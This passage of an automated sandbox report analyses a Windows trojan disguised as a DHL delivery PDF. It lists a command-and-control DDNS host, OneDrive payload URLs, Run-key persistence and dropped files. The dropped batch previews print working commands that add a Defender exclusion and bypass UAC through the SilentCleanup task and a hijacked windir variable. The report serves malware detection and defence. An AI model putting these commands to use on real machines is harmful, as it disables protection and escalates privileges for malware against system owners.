              18.1.Iqzenco.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              22.2.mobsync.exe.400000.0.unpack100%AviraHEUR/AGEN.1141389Download File
              0.1.ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              5.2.mobsync.exe.400000.0.unpack100%AviraHEUR/AGEN.1141389Download File
              26.2.secinit.exe.400000.0.unpack100%AviraHEUR/AGEN.1141389Download File
              16.0.Iqzenco.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              16.1.Iqzenco.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              ongod4ever.ddns.net0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              ongod4ever.ddns.net
              		185.140.53.15
              		truefalse
                		high
                onedrive.live.com
                		unknown
                		unknownfalse
                  		high
                  bl30uw.sn.files.1drv.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    ongod4ever.ddns.nettrue
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://bl30uw.sn.files.1drv.com/y4maOmpRLgEZgKpnLv-hczrMb96VqtMQDZd-m0g51QRpK-v8c65WYNUi2NOLDdGNQiUIqzenco.exe, 00000010.00000003.752060770.00000000007A3000.00000004.00000001.sdmpfalse
                      		high
                      https://bl30uw.sn.files.1drv.com/y4msI7_EyjC8cs97rdyt7ReCTl2WoedGiqx9hVOiugfpodFj4cXgoX5lAQfrGe41zrtIqzenco.exe, 00000010.00000003.750846747.00000000007A3000.00000004.00000001.sdmpfalse
                        		high
                        https://onedrive.live.com/download?cid=97429F42E815B766&resid=97429F42E815B766%21166&authkey=AFRFbbmIqzenco.exe, 00000010.00000003.752060770.00000000007A3000.00000004.00000001.sdmpfalse
                          		high
                          https://bl30uw.sn.files.1drv.com/y4mGst0byrg6Ub0CK8iKHaximJI4M7D1uUmqxfl02ZpIfKXbkyeYXQLL6P2J6UxS4YzIqzenco.exe, 00000010.00000003.750864485.00000000007B1000.00000004.00000001.sdmpfalse
                            		high

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            185.140.53.15
                            		ongod4ever.ddns.netSweden
                            		209623DAVID_CRAIGGGfalse

                            Private

                            IP
                            192.168.2.1

                            General Information

                            Joe Sandbox Version:33.0.0 White Diamond
                            Analysis ID:491719
                            Start date:27.09.2021
                            Start time:20:38:59
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 13m 28s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:28
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@23/10@49/2
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 44.2% (good quality ratio 42.2%)
                            • Quality average: 83.9%
                            • Quality standard deviation: 25.5%
                            HCA Information:
                            • Successful, ratio: 97%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                            • TCP Packets have been reduced to 100
                            • Excluded IPs from analysis (whitelisted): 20.82.210.154, 2.20.86.117, 13.107.43.13, 13.107.42.12, 20.82.209.183, 209.197.3.8, 13.107.42.13, 20.54.110.249, 40.112.88.60, 23.10.249.43, 23.10.249.26, 20.50.102.62
                            • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, l-0004.dc-msedge.net, l-0004.l-msedge.net, e12564.dspb.akamaiedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, odc-web-geo.onedrive.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, odc-sn-files-geo.onedrive.akadns.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, odc-sn-files-brs.onedrive.akadns.net, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            20:39:58API Interceptor2x Sleep call for process: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe modified
                            20:40:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Iqzenco C:\Users\Public\Libraries\ocnezqI.url
                            20:40:30AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Iqzenco C:\Users\Public\Libraries\ocnezqI.url
                            20:40:34API Interceptor2x Sleep call for process: Iqzenco.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASN

                            No context

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\Public\KDECO.bat
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):155
                            Entropy (8bit):4.687076340713226
                            Encrypted:false
                            SSDEEP:3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
                            MD5:213C60ADF1C9EF88DC3C9B2D579959D2
                            SHA1:E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
                            SHA-256:37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
                            SHA-512:FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
                            Malicious:false
                            Reputation:unknown
                            Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit
                            C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):1009152
                            Entropy (8bit):6.9988393829759294
                            Encrypted:false
                            SSDEEP:24576:L5A8SqIkJpbDpQc6ScVHdPaHxA7VhLRYF:Lr5ZoHdPaRyzKF
                            MD5:3808D4A11CBEE20896CCA28F9A3BCB9B
                            SHA1:B3A533D6E00ACE2EC0612C9AF66C6DD69C5180B3
                            SHA-256:53C2E53D33F80E88B16CCE06621F99680E0E5F387315CB81AF97CEE58080165A
                            SHA-512:980425EFD3D01A3C5ADBBD3873D819AF60C1E62A9B32149B01F1C1E6DE338D068B53C18AD4645C66E8C13DB8F21440F2E0C01B27E3B1E4AF55D19474EC83A5FD
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 24%
                            Reputation:unknown
                            Preview: MZ......................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^.*.................j...........z............@..............................................@...............................(......./...................@..0r...........0...............0..........................X....................................].......^.................. ..`........P....p.......b.............. ..`.........&.......(...n..............@............8.......................................(.......*..................@...........4.... ..................................0....0......................@..@........0r...@...t..................@..B........./.......0...6..............@..@.............0......................@..@................................................................................................
                            C:\Users\Public\Libraries\ocnezqI.url
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Iqzenco\\Iqzenco.exe">), ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):96
                            Entropy (8bit):4.740775825389126
                            Encrypted:false
                            SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMfiyGAywSsGKd6ov:HRYFVmTWDyzFlsbDv
                            MD5:5E9FED8C24BB01153751DF696536E82A
                            SHA1:D23E4B05254E62153D6F0158F4F869AB00C5DF15
                            SHA-256:08BC6F401999D30F1EB81AD3C9CB0EB01063CF858C9818F238ED233833947AE8
                            SHA-512:4920341592295B38653FD6DD227F99625A1E62C3E1E9CE014F506C724319528A6E45829C21B62A5674FF47BB3BD1B62FD2DB9A24583208DC7659E4B88A8BB7FD
                            Malicious:false
                            Yara Hits:
                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\ocnezqI.url, Author: @itsreallynick (Nick Carr)
                            Reputation:unknown
                            Preview: [InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Iqzenco\\Iqzenco.exe"..IconIndex=2..
                            C:\Users\Public\Trast.bat
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):34
                            Entropy (8bit):4.314972767530033
                            Encrypted:false
                            SSDEEP:3:LjTnaHF5wlM:rnaHSM
                            MD5:4068C9F69FCD8A171C67F81D4A952A54
                            SHA1:4D2536A8C28CDCC17465E20D6693FB9E8E713B36
                            SHA-256:24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
                            SHA-512:A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
                            Malicious:false
                            Reputation:unknown
                            Preview: start /min C:\Users\Public\UKO.bat
                            C:\Users\Public\UKO.bat
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):250
                            Entropy (8bit):4.865356627324657
                            Encrypted:false
                            SSDEEP:6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
                            MD5:EAF8D967454C3BBDDBF2E05A421411F8
                            SHA1:6170880409B24DE75C2DC3D56A506FBFF7F6622C
                            SHA-256:F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
                            SHA-512:FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
                            Malicious:false
                            Reputation:unknown
                            Preview: reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..
                            C:\Users\Public\nest
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):9
                            Entropy (8bit):3.169925001442312
                            Encrypted:false
                            SSDEEP:3:1xn:Hn
                            MD5:4D2B6925406544EEF7111380E2243791
                            SHA1:A32A8FA6F2E46D8E86FA92BEA3B8D45EB168BD04
                            SHA-256:09A841DC20255A929B3CCFA47B08B8E47ADD965FF3070E8DAB1DBD050D73E97F
                            SHA-512:EFDD6C90C7EAA5D05FDD079A61B969837B350CB20AECC7CF24533636956A939B8A289B2C3BB4A7AC21BBACF818E394A13D8661427EACFC0F21C46D5855DFFEDF
                            Malicious:false
                            Reputation:unknown
                            Preview: Iqzenco..
                            C:\Users\Public\nest.bat
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):53
                            Entropy (8bit):4.263285494083192
                            Encrypted:false
                            SSDEEP:3:LjT9fnMXdemzCK0vn:rZnMXd1CV
                            MD5:8ADA51400B7915DE2124BAAF75E3414C
                            SHA1:1A7B9DB12184AB7FD7FCE1C383F9670A00ADB081
                            SHA-256:45AA3957C29865260A78F03EEF18AE9AEBDBF7BEA751ECC88BE4A799F2BB46C7
                            SHA-512:9AFC138157A4565294CA49942579CDB6F5D8084E56F9354738DE62B585F4C0FA3E7F2CBC9541827F2084E3FF36C46EED29B46F5DD2444062FFCD05C599992E68
                            Malicious:false
                            Reputation:unknown
                            Preview: start /min reg delete hkcu\Environment /v windir /f..
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\Iqzencolmjnhoxprppdkgkfyidrxfas[1]
                            Process:C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):873984
                            Entropy (8bit):7.9969159829391385
                            Encrypted:true
                            SSDEEP:24576:WkRi6BScPafSfJKPyZ/Sba3koow5ba33m6YwEcds:WobBLafgJKPyZ/MpoaW6YP
                            MD5:6CFF8FAF4A45291638E775B0EB1DF24D
                            SHA1:472E6F7B86A62F191AD8A231CE58F356A046A2F7
                            SHA-256:195306105A3F635EA75E8D8E02987BB106B62C75AA1A6F4914A287E8DB424631
                            SHA-512:F23B002AC8D7060D065B7DAFA6AD39C07ED5AD5CE20394B88CCB65B7EBD74EA31EBC4710F853FF6DAA2926CC747AF797FBE3E8E01A79DDDD169E7AB9E9978308
                            Malicious:false
                            Reputation:unknown
                            Preview: .....6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]%......(& ...P...sZ.G..W#..v..FN.}r...kG.....c2>.......K.(& &!.)....7..6G..U..9.v..FN.}r...l.)....n.7..N.}r...oP..oP......2>X...X.u.;.....:.|..y1.-..n....6.X..OWOT...'.v....G..<.cgn.R.X........u.8..>5..{....wT.I....#......{..........).H t...wT.I....#......{..........&N.n..+..u.U"OT..t..X.....X....u.8..>5..{....wT.I....#......{..........|+m.z..h4.?9+Q........Nk....^U...y..I.u.....o...!{.M..dK.$....s.5;....m.Y..mr..".*...y...\.y..>.....F.;..k..a.......%~.....i.s.q.n!g.....+Ne.*.[.~...y..Ra.C..9<..q....J.v.......u.#a.Vp770./PdXs.......{.P`L..=8..{...]......96... .~...9 ..v..`Q...Zl/V|....'.r3;.u.>..1U..bU..j.V}..154...
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\Iqzencolmjnhoxprppdkgkfyidrxfas[1]
                            Process:C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):873984
                            Entropy (8bit):7.9969159829391385
                            Encrypted:true
                            SSDEEP:24576:WkRi6BScPafSfJKPyZ/Sba3koow5ba33m6YwEcds:WobBLafgJKPyZ/MpoaW6YP
                            MD5:6CFF8FAF4A45291638E775B0EB1DF24D
                            SHA1:472E6F7B86A62F191AD8A231CE58F356A046A2F7
                            SHA-256:195306105A3F635EA75E8D8E02987BB106B62C75AA1A6F4914A287E8DB424631
                            SHA-512:F23B002AC8D7060D065B7DAFA6AD39C07ED5AD5CE20394B88CCB65B7EBD74EA31EBC4710F853FF6DAA2926CC747AF797FBE3E8E01A79DDDD169E7AB9E9978308
                            Malicious:false
                            Reputation:unknown
                            Preview: .....6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]%......(& ...P...sZ.G..W#..v..FN.}r...kG.....c2>.......K.(& &!.)....7..6G..U..9.v..FN.}r...l.)....n.7..N.}r...oP..oP......2>X...X.u.;.....:.|..y1.-..n....6.X..OWOT...'.v....G..<.cgn.R.X........u.8..>5..{....wT.I....#......{..........).H t...wT.I....#......{..........&N.n..+..u.U"OT..t..X.....X....u.8..>5..{....wT.I....#......{..........|+m.z..h4.?9+Q........Nk....^U...y..I.u.....o...!{.M..dK.$....s.5;....m.Y..mr..".*...y...\.y..>.....F.;..k..a.......%~.....i.s.q.n!g.....+Ne.*.[.~...y..Ra.C..9<..q....J.v.......u.#a.Vp770./PdXs.......{.P`L..=8..{...]......96... .~...9 ..v..`Q...Zl/V|....'.r3;.u.>..1U..bU..j.V}..154...
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\Iqzencolmjnhoxprppdkgkfyidrxfas[1]
                            Process:C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):873984
                            Entropy (8bit):7.9969159829391385
                            Encrypted:true
                            SSDEEP:24576:WkRi6BScPafSfJKPyZ/Sba3koow5ba33m6YwEcds:WobBLafgJKPyZ/MpoaW6YP
                            MD5:6CFF8FAF4A45291638E775B0EB1DF24D
                            SHA1:472E6F7B86A62F191AD8A231CE58F356A046A2F7
                            SHA-256:195306105A3F635EA75E8D8E02987BB106B62C75AA1A6F4914A287E8DB424631
                            SHA-512:F23B002AC8D7060D065B7DAFA6AD39C07ED5AD5CE20394B88CCB65B7EBD74EA31EBC4710F853FF6DAA2926CC747AF797FBE3E8E01A79DDDD169E7AB9E9978308
                            Malicious:false
                            Reputation:unknown
                            Preview: .....6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]b....).....T.....4....o...$X....*m.......L5.8.5..6....M....7.Z..._cw S]%......(& ...P...sZ.G..W#..v..FN.}r...kG.....c2>.......K.(& &!.)....7..6G..U..9.v..FN.}r...l.)....n.7..N.}r...oP..oP......2>X...X.u.;.....:.|..y1.-..n....6.X..OWOT...'.v....G..<.cgn.R.X........u.8..>5..{....wT.I....#......{..........).H t...wT.I....#......{..........&N.n..+..u.U"OT..t..X.....X....u.8..>5..{....wT.I....#......{..........|+m.z..h4.?9+Q........Nk....^U...y..I.u.....o...!{.M..dK.$....s.5;....m.Y..mr..".*...y...\.y..>.....F.;..k..a.......%~.....i.s.q.n!g.....+Ne.*.[.~...y..Ra.C..9<..q....J.v.......u.#a.Vp770./PdXs.......{.P`L..=8..{...]......96... .~...9 ..v..`Q...Zl/V|....'.r3;.u.>..1U..bU..j.V}..154...

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.9988393829759294
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.94%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
                            File size:1009152
                            MD5:3808d4a11cbee20896cca28f9a3bcb9b
                            SHA1:b3a533d6e00ace2ec0612c9af66c6dd69c5180b3
                            SHA256:53c2e53d33f80e88b16cce06621f99680e0e5f387315cb81af97cee58080165a
                            SHA512:980425efd3d01a3c5adbbd3873d819af60c1e62a9b32149b01f1c1e6de338d068b53c18ad4645c66e8c13db8f21440f2e0c01b27e3b1e4af55d19474ec83a5fd
                            SSDEEP:24576:L5A8SqIkJpbDpQc6ScVHdPaHxA7VhLRYF:Lr5ZoHdPaRyzKF
                            File Content Preview:MZ......................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                            File Icon

                            Icon Hash:d2e6c45663c86871

                            Static PE Info

                            General

                            Entrypoint:0x477a08
                            Entrypoint Section:......
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                            DLL Characteristics:
                            Time Stamp:0x2A2E5E19 [Thu Jun 4 18:16:57 1992 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:7485e319df85e87afca01bdc77d12961

                            Entrypoint Preview

                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFF0h
                            mov eax, 00476B38h
                            call 00007F8F78AFEEADh
                            mov eax, dword ptr [0047A460h]
                            mov eax, dword ptr [eax]
                            call 00007F8F78B53339h
                            mov ecx, dword ptr [0047A270h]
                            mov eax, dword ptr [0047A460h]
                            mov eax, dword ptr [eax]
                            mov edx, dword ptr [0047656Ch]
                            call 00007F8F78B53339h
                            mov eax, dword ptr [0047A460h]
                            mov eax, dword ptr [eax]
                            call 00007F8F78B533ADh
                            call 00007F8F78AFCD1Ch
                            lea eax, dword ptr [eax+00h]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x7f0000x28e6......
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x8c0000x72fc2.....
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x840000x7230......
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x830180x18......
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x830000x18......
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x7f7ac0x658......
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .....0x10000x75dc00x75e00False0.529974151644data6.5690645697IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            ......0x770000xa500xc00False0.535807291667data5.68654279388IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            .....0x780000x26040x2800False0.41875data4.27539272227IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            ....0x7b0000x38d80x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            ......0x7f0000x28e60x2a00False0.317057291667data5.12299679952IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            ....0x820000x340x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            ......0x830000x300x200False0.1015625data0.606751191078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            ......0x840000x72300x7400False0.623013200431data6.65937740819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            .....0x8c0000x72fc20x73000False0.558258322011data6.93563526848IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountry
                            TMAP0x8caf40x197ebASCII text, with very long lines, with CRLF line terminatorsEnglishUnited States
                            RT_CURSOR0xa62e00x134dataEnglishUnited States
                            RT_CURSOR0xa64140x134dataEnglishUnited States
                            RT_CURSOR0xa65480x134dataEnglishUnited States
                            RT_CURSOR0xa667c0x134dataEnglishUnited States
                            RT_CURSOR0xa67b00x134dataEnglishUnited States
                            RT_CURSOR0xa68e40x134dataEnglishUnited States
                            RT_CURSOR0xa6a180x134dataEnglishUnited States
                            RT_BITMAP0xa6b4c0x1d0dataEnglishUnited States
                            RT_BITMAP0xa6d1c0x1e4dataEnglishUnited States
                            RT_BITMAP0xa6f000x1d0dataEnglishUnited States
                            RT_BITMAP0xa70d00x1d0dataEnglishUnited States
                            RT_BITMAP0xa72a00x1d0dataEnglishUnited States
                            RT_BITMAP0xa74700x1d0dataEnglishUnited States
                            RT_BITMAP0xa76400x1d0dataEnglishUnited States
                            RT_BITMAP0xa78100x1d0dataEnglishUnited States
                            RT_BITMAP0xa79e00x1d0dataEnglishUnited States
                            RT_BITMAP0xa7bb00x1d0dataEnglishUnited States
                            RT_BITMAP0xa7d800x506e0dataEnglishUnited States
                            RT_BITMAP0xf84600xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xf85480x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                            RT_ICON0xf89b00x988dataEnglishUnited States
                            RT_ICON0xf93380x10a8dataEnglishUnited States
                            RT_ICON0xfa3e00x25a8dataEnglishUnited States
                            RT_DIALOG0xfc9880x52data
                            RT_DIALOG0xfc9dc0x52data
                            RT_STRING0xfca300x148data
                            RT_STRING0xfcb780x390data
                            RT_STRING0xfcf080x1a4data
                            RT_STRING0xfd0ac0xc8data
                            RT_STRING0xfd1740x118data
                            RT_STRING0xfd28c0x39cdata
                            RT_STRING0xfd6280x390data
                            RT_STRING0xfd9b80x370data
                            RT_STRING0xfdd280x3ccdata
                            RT_STRING0xfe0f40x214data
